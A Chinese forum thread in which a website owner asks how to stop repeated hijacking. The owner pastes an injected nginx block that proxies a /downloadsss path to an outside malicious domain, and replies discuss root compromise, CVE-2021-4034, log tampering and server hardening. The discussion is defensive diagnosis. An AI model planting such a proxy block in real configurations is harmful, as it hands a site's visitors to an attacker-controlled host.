网站挂马 如何根治?

122 天前
 ccnoobs

疑问

自己的网站又挂马了,看了登录记录没有问题 ssh 端口也是只有我的 ip 才可以访问,还有什么工具可以直接修改 ng 的配置文件吗,没有排查的思绪了

配置详情

server {
  
  listen 80 default;
  server_name _;
location ^~ /downloadsss
{
    proxy_pass http://qwertyu.shijiediyi888.top;
    proxy_set_header Host qwertyu.shijiediyi888.top;
    proxy_set_header X-Real-IP $remote_addr;
    proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
    proxy_set_header REMOTE-HOST $host;
    proxy_http_version 1.1;
    # proxy_hide_header Upgrade;

    add_header X-Cache $upstream_cache_status;

    #Set Nginx Cache
    
    
    set $static_fileMJrCAYTq 0;
    if ( $uri ~* "\.(gif|png|jpg|css|js|woff|woff2)$" )
    {
     set $static_fileMJrCAYTq 1;
     expires 1m;
        }
    if ( $static_fileMJrCAYTq = 0 )
    {
    add_header Cache-Control no-cache;
    }
}
}
3555 次点击
所在节点    信息安全
26 条回复
ccnoobs
122 天前
排查 nginx 命令日志时发现

当时挂马修改 ng 时相关执行日志

May 28 22:53:35 instance-0b1899zb root[29772]: [euid=root]::[/tmp]2024-05-28 22:53:35 root ps aux | grep nginx
May 28 23:02:09 instance-0b1899zb root[30483]: [euid=root]::[/tmp]2024-05-28 23:02:09 root ps aux | grep nginx
May 28 23:02:14 instance-0b1899zb root[30500]: [euid=root]::[/tmp]2024-05-28 23:02:14 root /usr/local/nginx/sbin/nginx -s reload
May 28 23:03:28 instance-0b1899zb root[30604]: [euid=root]::[/tmp]2024-05-28 23:03:27 root /usr/local/nginx/sbin/nginx -s reload


我这边正常的操作日志是
May 28 23:45:16 instance-0b1899zb root[1560]: [euid=root]:root pts/1 2024-05-28 23:45 (*.151.207.139):[/usr/local/nginx/conf]2024-05-28 23:45:16 root cd /usr/local/nginx/conf/

大家知道为啥会缺少那么多信息吗
wheat0r
122 天前
@ccnoobs #21 你猜 root 能不能编辑日志文件
WoneFrank
122 天前
cve-2021-4034 这个是 linux 下 pkexec 逻辑提权的,直接能提到 root 权限。
你这个应该是自己跑的业务有漏洞被打了,也就是被人写了 webshell 或者直接利用 java 命令执行了。
root 被拿了多半会有各种计划任务、rootkit 之类的后门操作。
如果源码和数据有备份建议先把漏洞修了,然后重开一台新服务器再把业务部上去。
ccnoobs
122 天前
@WoneFrank 说的对 准备换个机器了
gray0
121 天前
新服务器的安全小思路:

1.不应直接以 root 身份登录,新建用户,避免任何容易猜到的内容,例如 admin
2.禁用 root 密码/ssh 登录
3.更改默认的 umask 大多数 Linux 发行版默认 umask 为 022 ,这为每个用户提供了读取权限 修改为 027
sudo bash -c 'echo -e "\numask 077" >> /etc/profile'
4. SSH 安全
SSH 默认从从 ~/.ssh/authorized_keys 读取授权密钥,改为从新建的用户那里读取
# 修改/etc/ssh/sshd_config
AuthorizedKeysFile /etc/ssh/authorized_keys/{user}
gray0
121 天前
@gray0 umask 077

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/1044936

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX